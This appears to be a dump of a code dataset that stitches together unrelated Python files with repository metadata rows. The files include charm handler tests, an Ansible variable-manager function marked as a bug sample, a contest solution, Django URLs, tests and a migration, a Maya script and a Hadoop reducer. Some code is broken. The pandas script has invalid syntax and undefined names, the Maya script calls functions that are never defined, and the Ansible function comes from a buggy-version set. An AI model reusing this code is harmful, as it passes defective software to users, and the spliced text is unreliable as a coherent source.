mock.call(
'designate',
'designate',
prefix='designate'),
mock.call(
'dpm',
'dpm',
prefix='dpm'),
]
database.configure.has_calls(calls)
self.assess_status.assert_called_once_with()
def test_setup_endpoint(self):
self.patch(handlers.designate, 'assess_status')
self.patch(handlers.designate, 'register_endpoints')
handlers.setup_endpoint('endpoint_object')
self.register_endpoints.assert_called_once_with('endpoint_object')
self.assess_status.assert_called_once_with()
def test_configure_designate_basic(self):
self.patch(handlers.reactive, 'set_state')
self.patch(handlers.designate, 'render_base_config')
self.patch(handlers.reactive.RelationBase, 'from_state')
handlers.configure_designate_basic('arg1', 'arg2')
self.render_base_config.assert_called_once_with(('arg1', 'arg2', ))
self.set_state.assert_called_once_with('base-config.rendered')
def test_run_db_migration(self):
self.patch(handlers.reactive, 'set_state')
self.patch(handlers.designate, 'db_sync')
self.patch(handlers.designate, 'db_sync_done')
self.db_sync_done.return_value = False
handlers.run_db_migration('arg1', 'arg2')
self.db_sync.assert_called_once_with()
self.assertFalse(self.set_state.called)
self.db_sync.reset_mock()
self.db_sync_done.return_value = True
handlers.run_db_migration('arg1', 'arg2')
self.db_sync.assert_called_once_with()
self.set_state.assert_called_once_with('db.synched')
def test_update_peers(self):
cluster = mock.MagicMock()
self.patch(handlers.designate, 'update_peers')
handlers.update_peers(cluster)
self.update_peers.assert_called_once_with(cluster)
def test_configure_designate_full(self):
self.patch(handlers.reactive.RelationBase, 'from_state',
return_value=None)
self.patch(handlers.designate, 'upgrade_if_available')
self.patch(handlers.designate, 'configure_ssl')
self.patch(handlers.designate, 'render_full_config')
self.patch(handlers.designate, 'create_initial_servers_and_domains')
self.patch(handlers.designate, 'render_sink_configs')
self.patch(handlers.designate, 'render_rndc_keys')
self.patch(handlers.designate, 'update_pools')
handlers.configure_designate_full('arg1', 'arg2')
self.configure_ssl.assert_called_once_with()
self.render_full_config.assert_called_once_with(('arg1', 'arg2', ))
self.create_initial_servers_and_domains.assert_called_once_with()
self.render_sink_configs.assert_called_once_with(('arg1', 'arg2', ))
self.render_rndc_keys.assert_called_once_with()
self.update_pools.assert_called_once_with()
self.upgrade_if_available.assert_called_once_with(('arg1', 'arg2', ))
def test_cluster_connected(self):
hacluster = mock.MagicMock()
self.patch(handlers.designate, 'configure_ha_resources')
self.patch(handlers.designate, 'assess_status')
handlers.cluster_connected(hacluster)
self.configure_ha_resources.assert_called_once_with(hacluster)
self.assess_status.assert_called_once_with()
def test_config_changed(self):
self.patch(handlers.designate, 'assess_status')
handlers.config_changed()
self.assess_status.assert_called_once_with()
| [
"[email protected]"
] | |
39c5d3e06b0fad48616e9688fc70e2af251dee01 | f07a42f652f46106dee4749277d41c302e2b7406 | /Data Set/bug-fixing-5/c65b7eb52e3f1999292f845bce19d7f541645f76-<get_vars>-bug.py | 57b28261fcc6bd7b9b54383cb83a1463a1812690 | [] | no_license | wsgan001/PyFPattern | e0fe06341cc5d51b3ad0fe29b84098d140ed54d1 | cc347e32745f99c0cd95e79a18ddacc4574d7faa | refs/heads/main | 2023-08-25T23:48:26.112133 | 2021-10-23T14:11:22 | 2021-10-23T14:11:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,662 | py | def get_vars(self, play=None, host=None, task=None, include_hostvars=True, include_delegate_to=True, use_cache=True):
'\n Returns the variables, with optional "context" given via the parameters\n for the play, host, and task (which could possibly result in different\n sets of variables being returned due to the additional context).\n\n The order of precedence is:\n - play->roles->get_default_vars (if there is a play context)\n - group_vars_files[host] (if there is a host context)\n - host_vars_files[host] (if there is a host context)\n - host->get_vars (if there is a host context)\n - fact_cache[host] (if there is a host context)\n - play vars (if there is a play context)\n - play vars_files (if there\'s no host context, ignore\n file names that cannot be templated)\n - task->get_vars (if there is a task context)\n - vars_cache[host] (if there is a host context)\n - extra vars\n '
display.debug('in VariableManager get_vars()')
all_vars = dict()
magic_variables = self._get_magic_variables(play=play, host=host, task=task, include_hostvars=include_hostvars, include_delegate_to=include_delegate_to)
basedirs = [self._loader.get_basedir()]
if play:
for role in play.get_roles():
all_vars = combine_vars(all_vars, role.get_default_vars())
if task:
if (C.PLAYBOOK_VARS_ROOT == 'all'):
basedirs = task.get_search_path()
elif (C.PLAYBOOK_VARS_ROOT in ('bottom', 'playbook_dir')):
basedirs = [task.get_search_path()[0]]
elif (C.PLAYBOOK_VARS_ROOT != 'top'):
raise AnsibleError(('Unkown playbook vars logic: %s' % C.PLAYBOOK_VARS_ROOT))
if ((task._role is not None) and (play or (task.action == 'include_role'))):
all_vars = combine_vars(all_vars, task._role.get_default_vars(dep_chain=task.get_dep_chain()))
if host:
all_group = self._inventory.groups.get('all')
host_groups = sort_groups([g for g in host.get_groups() if (g.name not in ['all'])])
def _get_plugin_vars(plugin, path, entities):
data = {
}
try:
data = plugin.get_vars(self._loader, path, entities)
except AttributeError:
try:
for entity in entities:
if isinstance(entity, Host):
data.update(plugin.get_host_vars(entity.name))
else:
data.update(plugin.get_group_vars(entity.name))
except AttributeError:
if hasattr(plugin, 'run'):
raise AnsibleError(('Cannot use v1 type vars plugin %s from %s' % (plugin._load_name, plugin._original_path)))
else:
raise AnsibleError(('Invalid vars plugin %s from %s' % (plugin._load_name, plugin._original_path)))
return data
def _plugins_inventory(entities):
' merges all entities by inventory source '
data = {
}
for inventory_dir in self._inventory._sources:
if ((',' in inventory_dir) and (not os.path.exists(inventory_dir))):
continue
elif (not os.path.isdir(inventory_dir)):
inventory_dir = os.path.dirname(inventory_dir)
for plugin in vars_loader.all():
data = combine_vars(data, _get_plugin_vars(plugin, inventory_dir, entities))
return data
def _plugins_play(entities):
' merges all entities adjacent to play '
data = {
}
for plugin in vars_loader.all():
for path in basedirs:
data = combine_vars(data, _get_plugin_vars(plugin, path, entities))
return data
def all_inventory():
return all_group.get_vars()
def all_plugins_inventory():
return _plugins_inventory([all_group])
def all_plugins_play():
return _plugins_play([all_group])
def groups_inventory():
' gets group vars from inventory '
return get_group_vars(host_groups)
def groups_plugins_inventory():
' gets plugin sources from inventory for groups '
return _plugins_inventory(host_groups)
def groups_plugins_play():
' gets plugin sources from play for groups '
return _plugins_play(host_groups)
def plugins_by_groups():
'\n merges all plugin sources by group,\n This should be used instead, NOT in combination with the other groups_plugins* functions\n '
data = {
}
for group in host_groups:
data[group] = combine_vars(data[group], _plugins_inventory(group))
data[group] = combine_vars(data[group], _plugins_play(group))
return data
for entry in C.VARIABLE_PRECEDENCE:
if (entry in self._ALLOWED):
display.debug(('Calling %s to load vars for %s' % (entry, host.name)))
all_vars = combine_vars(all_vars, locals()[entry]())
else:
display.warning(('Ignoring unknown variable precedence entry: %s' % entry))
all_vars = combine_vars(all_vars, host.get_vars())
all_vars = combine_vars(all_vars, _plugins_inventory([host]))
all_vars = combine_vars(all_vars, _plugins_play([host]))
try:
facts = self._fact_cache.get(host.name, {
})
all_vars.update(namespace_facts(facts))
if C.INJECT_FACTS_AS_VARS:
all_vars = combine_vars(all_vars, wrap_var(facts))
else:
all_vars = combine_vars(all_vars, wrap_var({
'ansible_local': facts.get('ansible_local', {
}),
}))
except KeyError:
pass
if play:
all_vars = combine_vars(all_vars, play.get_vars())
vars_files = play.get_vars_files()
try:
for vars_file_item in vars_files:
temp_vars = combine_vars(all_vars, self._extra_vars)
temp_vars = combine_vars(temp_vars, magic_variables)
templar = Templar(loader=self._loader, variables=temp_vars)
vars_file_list = vars_file_item
if (not isinstance(vars_file_list, list)):
vars_file_list = [vars_file_list]
try:
for vars_file in vars_file_list:
vars_file = templar.template(vars_file)
try:
data = preprocess_vars(self._loader.load_from_file(vars_file, unsafe=True))
if (data is not None):
for item in data:
all_vars = combine_vars(all_vars, item)
break
except AnsibleFileNotFound:
continue
except AnsibleParserError:
raise
else:
if include_delegate_to:
raise AnsibleFileNotFound(('vars file %s was not found' % vars_file_item))
except (UndefinedError, AnsibleUndefinedVariable):
if ((host is not None) and self._fact_cache.get(host.name, dict()).get('module_setup') and (task is not None)):
raise AnsibleUndefinedVariable(("an undefined variable was found when attempting to template the vars_files item '%s'" % vars_file_item), obj=vars_file_item)
else:
display.vvv(("skipping vars_file '%s' due to an undefined variable" % vars_file_item))
continue
display.vvv(("Read vars_file '%s'" % vars_file_item))
except TypeError:
raise AnsibleParserError(("Error while reading vars files - please supply a list of file names. Got '%s' of type %s" % (vars_files, type(vars_files))))
if (not C.DEFAULT_PRIVATE_ROLE_VARS):
for role in play.get_roles():
all_vars = combine_vars(all_vars, role.get_vars(include_params=False))
if task:
if task._role:
all_vars = combine_vars(all_vars, task._role.get_vars(task.get_dep_chain(), include_params=False))
all_vars = combine_vars(all_vars, task.get_vars())
if host:
all_vars = combine_vars(all_vars, self._vars_cache.get(host.get_name(), dict()))
all_vars = combine_vars(all_vars, self._nonpersistent_fact_cache.get(host.name, dict()))
if task:
if task._role:
all_vars = combine_vars(all_vars, task._role.get_role_params(task.get_dep_chain()))
all_vars = combine_vars(all_vars, task.get_include_params())
all_vars = combine_vars(all_vars, self._extra_vars)
all_vars = combine_vars(all_vars, magic_variables)
if task:
all_vars['environment'] = task.environment
if (task and (task.delegate_to is not None) and include_delegate_to):
all_vars['ansible_delegated_vars'] = self._get_delegated_vars(play, task, all_vars)
if (task or play):
all_vars['vars'] = all_vars.copy()
display.debug('done with get_vars()')
return all_vars | [
"[email protected]"
] | |
9b58eff7ed3daf3e244f4bf1236dffbbb10d87fc | a222e2999251ba7f0d62c428ba8cc170b6d0b3b7 | /AtC_Beg_Con_111-120/ABC111/B-AtCoder_Beginner_Contest_111.py | 81b7210ed85e1fae5ea424f1edba455792a672aa | [
"MIT"
] | permissive | yosho-18/AtCoder | 3e1f3070c5eb44f154c8104fbd5449f47446ce14 | 50f6d5c92a01792552c31ac912ce1cd557b06fb0 | refs/heads/master | 2020-06-02T10:21:29.458365 | 2020-05-29T12:40:48 | 2020-05-29T12:40:48 | 188,795,239 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 365 | py | n = int(input())
if n <= 111:
print(111)
if n > 111 and n <= 222:
print(222)
if n > 222 and n <= 333:
print(333)
if n > 333 and n <= 444:
print(444)
if n > 444 and n <= 555:
print(555)
if n > 555 and n <= 666:
print(666)
if n > 666 and n <= 777:
print(777)
if n > 777 and n <= 888:
print(888)
if n > 888 and n <= 999:
print(999) | [
"[email protected]"
] | |
7ea4bcf5409fe244dc0f83e9747b2ac105b38bb1 | 1b05b6f4d96a14ba2beea7ff43bdaae124bbe41b | /Gdt/algorithm/algorithm/dxregulation.py | f4f402d65a63ddd6ec0dcb3c4fc66b74c731761b | [] | no_license | shmilyrj126/NetWork | 27fcbde777c6ee25abfdd09a381c1a7a743d742a | 957f0679f01d2a09d217516518ddd9693c0b2a80 | refs/heads/master | 2022-12-13T00:19:04.208089 | 2020-09-17T12:59:29 | 2020-09-17T12:59:29 | 296,340,198 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 474 | py | # -*- coding: utf-8 -*-
"""
Created on Fri Nov 22 09:11:21 2019
@author: hsc
"""
import numpy as np
import pandas as pd #导入pandas包
data1= pd.read_csv("C:\\Users\\hsc\\Desktop\\w4.csv")
data2= pd.read_csv("C:\\Users\\hsc\\Desktop\\w5.csv")
print(data1)
print(data2)
n=len(data1)
data3=DataFrame(columns== ["N", "1", "2", "3"])
for i in n :
if data1["V1"]=data2["N1"]:
data3["N"]=data2.index
| [
"[email protected]"
] | |
7586f72297b50d92a4df016f506943d913a98140 | 3a891a79be468621aae43defd9a5516f9763f36e | /desktop/core/ext-py/Django-1.11/tests/admin_docs/test_views.py | bd483007c7553bfdb214341ed689c51dc66bb467 | [
"BSD-3-Clause",
"Python-2.0",
"Apache-2.0"
] | permissive | oyorooms/hue | b53eb87f805063a90f957fd2e1733f21406269aa | 4082346ef8d5e6a8365b05752be41186840dc868 | refs/heads/master | 2020-04-15T20:31:56.931218 | 2019-01-09T19:02:21 | 2019-01-09T19:05:36 | 164,998,117 | 4 | 2 | Apache-2.0 | 2019-01-10T05:47:36 | 2019-01-10T05:47:36 | null | UTF-8 | Python | false | false | 14,953 | py | from __future__ import unicode_literals
import sys
import unittest
from django.conf import settings
from django.contrib.admindocs import utils, views
from django.contrib.admindocs.views import get_return_data_type, simplify_regex
from django.contrib.sites.models import Site
from django.db import models
from django.db.models import fields
from django.test import SimpleTestCase, modify_settings, override_settings
from django.test.utils import captured_stderr
from django.urls import reverse
from django.utils import six
from .models import Company, Person
from .tests import AdminDocsTestCase, TestDataMixin
@unittest.skipUnless(utils.docutils_is_available, "no docutils installed.")
class AdminDocViewTests(TestDataMixin, AdminDocsTestCase):
def setUp(self):
self.client.force_login(self.superuser)
def test_index(self):
response = self.client.get(reverse('django-admindocs-docroot'))
self.assertContains(response, '<h1>Documentation</h1>', html=True)
self.assertContains(response, '<h1 id="site-name"><a href="/admin/">Django administration</a></h1>')
self.client.logout()
response = self.client.get(reverse('django-admindocs-docroot'), follow=True)
# Should display the login screen
self.assertContains(response, '<input type="hidden" name="next" value="/admindocs/" />', html=True)
def test_bookmarklets(self):
response = self.client.get(reverse('django-admindocs-bookmarklets'))
self.assertContains(response, '/admindocs/views/')
def test_templatetag_index(self):
response = self.client.get(reverse('django-admindocs-tags'))
self.assertContains(response, '<h3 id="built_in-extends">extends</h3>', html=True)
def test_templatefilter_index(self):
response = self.client.get(reverse('django-admindocs-filters'))
self.assertContains(response, '<h3 id="built_in-first">first</h3>', html=True)
def test_view_index(self):
response = self.client.get(reverse('django-admindocs-views-index'))
self.assertContains(
response,
'<h3><a href="/admindocs/views/django.contrib.admindocs.views.BaseAdminDocsView/">/admindocs/</a></h3>',
html=True
)
self.assertContains(response, 'Views by namespace test')
self.assertContains(response, 'Name: <code>test:func</code>.')
@unittest.skipIf(six.PY2, "Python 2 doesn't support __qualname__.")
def test_view_index_with_method(self):
"""
Views that are methods are listed correctly.
"""
response = self.client.get(reverse('django-admindocs-views-index'))
self.assertContains(
response,
'<h3><a href="/admindocs/views/django.contrib.admin.sites.AdminSite.index/">/admin/</a></h3>',
html=True
)
def test_view_detail(self):
url = reverse('django-admindocs-views-detail', args=['django.contrib.admindocs.views.BaseAdminDocsView'])
response = self.client.get(url)
# View docstring
self.assertContains(response, 'Base view for admindocs views.')
@override_settings(ROOT_URLCONF='admin_docs.namespace_urls')
def test_namespaced_view_detail(self):
url = reverse('django-admindocs-views-detail', args=['admin_docs.views.XViewClass'])
response = self.client.get(url)
self.assertContains(response, '<h1>admin_docs.views.XViewClass</h1>')
def test_view_detail_illegal_import(self):
url = reverse('django-admindocs-views-detail', args=['urlpatterns_reverse.nonimported_module.view'])
response = self.client.get(url)
self.assertEqual(response.status_code, 404)
self.assertNotIn("urlpatterns_reverse.nonimported_module", sys.modules)
def test_view_detail_as_method(self):
"""
Views that are methods can be displayed.
"""
url = reverse('django-admindocs-views-detail', args=['django.contrib.admin.sites.AdminSite.index'])
response = self.client.get(url)
self.assertEqual(response.status_code, 200 if six.PY3 else 404)
def test_model_index(self):
response = self.client.get(reverse('django-admindocs-models-index'))
self.assertContains(
response,
'<h2 id="app-auth">Authentication and Authorization (django.contrib.auth)</h2>',
html=True
)
def test_template_detail(self):
response = self.client.get(reverse('django-admindocs-templates', args=['admin_doc/template_detail.html']))
self.assertContains(response, '<h1>Template: "admin_doc/template_detail.html"</h1>', html=True)
def test_missing_docutils(self):
utils.docutils_is_available = False
try:
response = self.client.get(reverse('django-admindocs-docroot'))
self.assertContains(
response,
'<h3>The admin documentation system requires Python\'s '
'<a href="http://docutils.sf.net/">docutils</a> library.</h3>',
html=True
)
self.assertContains(response, '<h1 id="site-name"><a href="/admin/">Django administration</a></h1>')
finally:
utils.docutils_is_available = True
@modify_settings(INSTALLED_APPS={'remove': 'django.contrib.sites'})
@override_settings(SITE_ID=None) # will restore SITE_ID after the test
def test_no_sites_framework(self):
"""
Without the sites framework, should not access SITE_ID or Site
objects. Deleting settings is fine here as UserSettingsHolder is used.
"""
Site.objects.all().delete()
del settings.SITE_ID
response = self.client.get(reverse('django-admindocs-views-index'))
self.assertContains(response, 'View documentation')
@override_settings(TEMPLATES=[{
'NAME': 'ONE',
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'APP_DIRS': True,
}, {
'NAME': 'TWO',
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'APP_DIRS': True,
}])
@unittest.skipUnless(utils.docutils_is_available, "no docutils installed.")
class AdminDocViewWithMultipleEngines(AdminDocViewTests):
def test_templatefilter_index(self):
# Overridden because non-trivial TEMPLATES settings aren't supported
# but the page shouldn't crash (#24125).
response = self.client.get(reverse('django-admindocs-filters'))
self.assertContains(response, '<title>Template filters</title>', html=True)
def test_templatetag_index(self):
# Overridden because non-trivial TEMPLATES settings aren't supported
# but the page shouldn't crash (#24125).
response = self.client.get(reverse('django-admindocs-tags'))
self.assertContains(response, '<title>Template tags</title>', html=True)
@unittest.skipUnless(utils.docutils_is_available, "no docutils installed.")
class TestModelDetailView(TestDataMixin, AdminDocsTestCase):
def setUp(self):
self.client.force_login(self.superuser)
with captured_stderr() as self.docutils_stderr:
self.response = self.client.get(reverse('django-admindocs-models-detail', args=['admin_docs', 'Person']))
def test_method_excludes(self):
"""
Methods that begin with strings defined in
``django.contrib.admindocs.views.MODEL_METHODS_EXCLUDE``
shouldn't be displayed in the admin docs.
"""
self.assertContains(self.response, "<td>get_full_name</td>")
self.assertNotContains(self.response, "<td>_get_full_name</td>")
self.assertNotContains(self.response, "<td>add_image</td>")
self.assertNotContains(self.response, "<td>delete_image</td>")
self.assertNotContains(self.response, "<td>set_status</td>")
self.assertNotContains(self.response, "<td>save_changes</td>")
def test_methods_with_arguments(self):
"""
Methods that take arguments should also displayed.
"""
self.assertContains(self.response, "<h3>Methods with arguments</h3>")
self.assertContains(self.response, "<td>rename_company</td>")
self.assertContains(self.response, "<td>dummy_function</td>")
self.assertContains(self.response, "<td>suffix_company_name</td>")
def test_methods_with_arguments_display_arguments(self):
"""
Methods with arguments should have their arguments displayed.
"""
self.assertContains(self.response, "<td>new_name</td>")
def test_methods_with_arguments_display_arguments_default_value(self):
"""
Methods with keyword arguments should have their arguments displayed.
"""
self.assertContains(self.response, "<td>suffix='ltd'</td>")
def test_methods_with_multiple_arguments_display_arguments(self):
"""
Methods with multiple arguments should have all their arguments
displayed, but omitting 'self'.
"""
self.assertContains(self.response, "<td>baz, rox, *some_args, **some_kwargs</td>")
def test_method_data_types(self):
company = Company.objects.create(name="Django")
person = Person.objects.create(first_name="Human", last_name="User", company=company)
self.assertEqual(get_return_data_type(person.get_status_count.__name__), 'Integer')
self.assertEqual(get_return_data_type(person.get_groups_list.__name__), 'List')
def test_descriptions_render_correctly(self):
"""
The ``description`` field should render correctly for each field type.
"""
# help text in fields
self.assertContains(self.response, "<td>first name - The person's first name</td>")
self.assertContains(self.response, "<td>last name - The person's last name</td>")
# method docstrings
self.assertContains(self.response, "<p>Get the full name of the person</p>")
link = '<a class="reference external" href="/admindocs/models/%s/">%s</a>'
markup = '<p>the related %s object</p>'
company_markup = markup % (link % ("admin_docs.company", "admin_docs.Company"))
# foreign keys
self.assertContains(self.response, company_markup)
# foreign keys with help text
self.assertContains(self.response, "%s\n - place of work" % company_markup)
# many to many fields
self.assertContains(
self.response,
"number of related %s objects" % (link % ("admin_docs.group", "admin_docs.Group"))
)
self.assertContains(
self.response,
"all related %s objects" % (link % ("admin_docs.group", "admin_docs.Group"))
)
# "raw" and "include" directives are disabled
self.assertContains(self.response, '<p>"raw" directive disabled.</p>',)
self.assertContains(self.response, '.. raw:: html\n :file: admin_docs/evilfile.txt')
self.assertContains(self.response, '<p>"include" directive disabled.</p>',)
self.assertContains(self.response, '.. include:: admin_docs/evilfile.txt')
out = self.docutils_stderr.getvalue()
self.assertIn('"raw" directive disabled', out)
self.assertIn('"include" directive disabled', out)
def test_model_with_many_to_one(self):
link = '<a class="reference external" href="/admindocs/models/%s/">%s</a>'
response = self.client.get(
reverse('django-admindocs-models-detail', args=['admin_docs', 'company'])
)
self.assertContains(
response,
"number of related %s objects" % (link % ("admin_docs.person", "admin_docs.Person"))
)
self.assertContains(
response,
"all related %s objects" % (link % ("admin_docs.person", "admin_docs.Person"))
)
def test_model_with_no_backward_relations_render_only_relevant_fields(self):
"""
A model with ``related_name`` of `+` shouldn't show backward
relationship links.
"""
response = self.client.get(reverse('django-admindocs-models-detail', args=['admin_docs', 'family']))
fields = response.context_data.get('fields')
self.assertEqual(len(fields), 2)
def test_model_docstring_renders_correctly(self):
summary = (
'<h2 class="subhead"><p>Stores information about a person, related to <a class="reference external" '
'href="/admindocs/models/myapp.company/">myapp.Company</a>.</p></h2>'
)
subheading = '<p><strong>Notes</strong></p>'
body = '<p>Use <tt class="docutils literal">save_changes()</tt> when saving this object.</p>'
model_body = (
'<dl class="docutils"><dt><tt class="'
'docutils literal">company</tt></dt><dd>Field storing <a class="'
'reference external" href="/admindocs/models/myapp.company/">'
'myapp.Company</a> where the person works.</dd></dl>'
)
self.assertContains(self.response, 'DESCRIPTION')
self.assertContains(self.response, summary, html=True)
self.assertContains(self.response, subheading, html=True)
self.assertContains(self.response, body, html=True)
self.assertContains(self.response, model_body, html=True)
def test_model_detail_title(self):
self.assertContains(self.response, '<h1>admin_docs.Person</h1>', html=True)
class CustomField(models.Field):
description = "A custom field type"
class DescriptionLackingField(models.Field):
pass
class TestFieldType(unittest.TestCase):
def setUp(self):
pass
def test_field_name(self):
with self.assertRaises(AttributeError):
views.get_readable_field_data_type("NotAField")
def test_builtin_fields(self):
self.assertEqual(
views.get_readable_field_data_type(fields.BooleanField()),
'Boolean (Either True or False)'
)
def test_custom_fields(self):
self.assertEqual(views.get_readable_field_data_type(CustomField()), 'A custom field type')
self.assertEqual(
views.get_readable_field_data_type(DescriptionLackingField()),
'Field of type: DescriptionLackingField'
)
class AdminDocViewFunctionsTests(SimpleTestCase):
def test_simplify_regex(self):
tests = (
(r'^a', '/a'),
(r'^(?P<a>\w+)/b/(?P<c>\w+)/$', '/<a>/b/<c>/'),
(r'^(?P<a>\w+)/b/(?P<c>\w+)$', '/<a>/b/<c>'),
(r'^(?P<a>\w+)/b/(\w+)$', '/<a>/b/<var>'),
(r'^(?P<a>\w+)/b/((x|y)\w+)$', '/<a>/b/<var>'),
(r'^(?P<a>(x|y))/b/(?P<c>\w+)$', '/<a>/b/<c>'),
(r'^(?P<a>(x|y))/b/(?P<c>\w+)ab', '/<a>/b/<c>ab'),
(r'^(?P<a>(x|y)(\(|\)))/b/(?P<c>\w+)ab', '/<a>/b/<c>ab'),
(r'^a/?$', '/a/'),
)
for pattern, output in tests:
self.assertEqual(simplify_regex(pattern), output)
| [
"[email protected]"
] | |
a5cbd4174a07e88112f6ff2349b897cace44db22 | 581c041a0a32f051508f3b0a167656cb6169c2fe | /project_management/notifications/.svn/text-base/urls.py.svn-base | 86d4d6a3ade25ed394867f009ed21fd231ac89d5 | [] | no_license | raveena17/ILASM | da38258b6739e823b973c2bede2a21dd04e0941e | 7a337e0e3a20180b9564de68ab22620dc9aa1a36 | refs/heads/master | 2022-12-05T14:34:45.929663 | 2019-06-25T14:18:47 | 2019-06-25T14:18:47 | 193,101,540 | 0 | 0 | null | 2022-12-03T15:11:35 | 2019-06-21T13:20:47 | JavaScript | UTF-8 | Python | false | false | 325 | """
urls for event application
"""
from django.conf.urls.defaults import patterns
urlpatterns = patterns('project_management.notifications',
(r'^create/$', 'views.manage_event'),
(r'^update/(?P<id>\d+)/$', 'views.manage_event'),
(r'^list/$', 'views.event_list'),
(r'^delete/$', 'views.delete_event'),
)
| [
"[email protected]"
] | ||
76a97aedfd25a25ec5052821f9d86f5d50382bcd | aa0366a8632f334fb35e6bdc78717f3456202eb7 | /old/bdApiGetCom_v02.py | 676422673aa737b8010d9f1ed60f43dc04226cfb | [] | no_license | Mortaciunea/bdScripts | 0891478096f3a5876655896c9649c0a7204d5ee8 | 4f6e9d2b181bb4a90c1ccfcaca64c22ecbe0dd59 | refs/heads/master | 2020-12-24T13:36:57.930038 | 2015-09-03T16:03:46 | 2015-09-03T16:03:46 | 41,869,547 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,026 | py | import maya.cmds as cmds
import maya.OpenMaya as om
def bdGetCentroid(vectorArray):
center = ((vectorArray[0] - pointInsideVec) + (vectorArray[1] - pointInsideVec) + (vectorArray[2] - pointInsideVec))/4
return center
def bdGetComMain():
mDagObject = om.MDagPath()
mSelList = om.MSelectionList()
mDagPointInside = om.MDagPath()
mSelList.add('pointInsideLoc')
mSelList.getDagPath(0,mDagPointInside)
#mDagPointInside.pop()
mTransformPointInside = om.MFnTransform(mDagPointInside)
mPointInsideVector = mTransformPointInside.getTranslation(om.MSpace.kWorld)
print mDagPointInside.fullPathName()
om.MGlobal.getActiveSelectionList(mSelList)
numSel = mSelList.length()
if numSel == 1:
mSelList.getDagPath(0,mDagObject)
#print mDagObject.fullPathName()
if mDagObject.hasFn(om.MFn.kMesh):
mFnMesh = om.MFnMesh(mDagObject)
volumes = om.MFloatArray()
centers = om.MVectorArray()
for i in range(mFnMesh.numPolygons()):
mVertsId = om.MIntArray()
mFnMesh.getPolygonVertices(i,mVertsId)
mVertPosArray = om.MVectorArray()
for vert in mVertsId:
mVertPos = om.MPoint()
mFnMesh.getPoint(vert,mVertPos)
mPointVector = om.MVector(mVertPos)
mVertPosArray.append(mPointVector)
volumes.append(bdCalculateVolume(mVertPosArray,mPointInsideVector))
centers.append(bdCalculateCenter(mVertPosArray,mPointInsideVector))
totalVolume = 0
for vol in volumes:
totalVolume +=vol
print 'Total Volume :', totalVolume
centerMass = om.MVector()
for i in range(mFnMesh.numPolygons()):
centerMass += centers[i]*volumes[i]
centerMass = centerMass / totalVolume
print centerMass.x, centerMass.y,centerMass.z
mSelList.add('comLoc')
mComLoc = om.MDagPath()
mSelList.getDagPath(1,mComLoc)
mTransformComLoc = om.MFnTransform(mComLoc)
print mComLoc.fullPathName()
mTransformComLoc.translateBy(centerMass,om.MSpace.kWorld)
bdGetComMain() | [
"[email protected]"
] | |
550be29c5bc9d3a289d807df0b4515fa7991f024 | 196cd24f0dcd927779a42a39a5395baa3e3ad9dc | /groups/migrations/0004_auto_20200726_1934.py | 0379bc6dc5af9c21d553711693e9195ceabf0c65 | [
"MIT"
] | permissive | Hedera-Lang-Learn/hedera | d38ac067ebcfa774eb8a916e20144d5e2a079c57 | f44773bcf7695f4f73f0cd71daed7767902bcfd4 | refs/heads/dev | 2023-06-23T01:41:02.429563 | 2023-06-13T20:17:24 | 2023-06-13T20:17:24 | 154,722,012 | 9 | 3 | MIT | 2023-06-13T20:17:25 | 2018-10-25T18:53:59 | Python | UTF-8 | Python | false | false | 844 | py | # Generated by Django 2.2.13 on 2020-07-26 19:34
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('groups', '0003_auto_20200603_1933'),
]
operations = [
migrations.AddField(
model_name='group',
name='created_at',
field=models.DateTimeField(default=django.utils.timezone.now),
),
migrations.AddField(
model_name='group',
name='created_by',
field=models.ForeignKey(default=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='created_classes', to=settings.AUTH_USER_MODEL),
),
]
| [
"[email protected]"
] | |
114f7b56097b295584afe4163441cf97202ab66e | 377bc20bb72234f0095eedba83ddbfaad79c50bb | /django05_static/django05_static/urls.py | 9450e495dbe52787cbdc2b33ee89311953865a69 | [] | no_license | choicoding1026/Django | 56fcf9932095829b26037ab5c506882ea31f7f33 | 4bbdf0e0f79175e10f8f75a29c2bc8f0ebd5328c | refs/heads/master | 2022-12-19T20:07:22.904082 | 2020-09-28T08:46:58 | 2020-09-28T08:46:58 | 298,218,997 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 836 | py | """django05_static URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path
from django.urls.conf import include
urlpatterns = [
path('admin/', admin.site.urls),
path('main/', include('myapp.urls')),
]
| [
"[email protected]"
] | |
da278ac32c41ed3843c40753b8dcdc5c5ea6c64f | 272a078b59a1a780ab7cccf4e2741fcd447ca37c | /examples/streaming/wordCount/reducer.py | 39ec1edf7accec778833f3e52b165c3600a8bfbd | [] | no_license | casunlight/hadoop-tutorial | 12dd2594b0990ad452bee01de0a2b6ceabe92501 | 6d45091fc92d39fe495f3f1a69acc493e2fe0c60 | refs/heads/master | 2020-03-26T22:11:56.028574 | 2018-11-26T00:20:41 | 2018-11-26T00:20:41 | 145,439,797 | 2 | 2 | null | 2018-09-11T18:26:26 | 2018-08-20T15:59:39 | Shell | UTF-8 | Python | false | false | 1,076 | py | #!/usr/bin/python
from __future__ import print_function
import sys
#variable initialization
current_word = None
current_count = 0
word = None
# takes input stdin
for line in sys.stdin:
# trim any leading and trailing spaces
line = line.strip()
# split the input from mapper.py and take the word and its count
word, count = line.split('\t', 1)
# convert count string to int
try:
count = int(count)
except ValueError:
# in case of exception
# ignore the exception and discard the input line
continue
# this IF-switch only works because Hadoop sorts map output
# by key (here: word) before it is passed to the reducer
if current_word == word:
current_count += count
else:
if current_word:
# write result to STDOUT
print('{}\t{}'.format(current_word, current_count))
current_count = count
current_word = word
# do not forget to output the last word if needed!
if current_word == word:
print('{}\t{}'.format(current_word, current_count))
| [
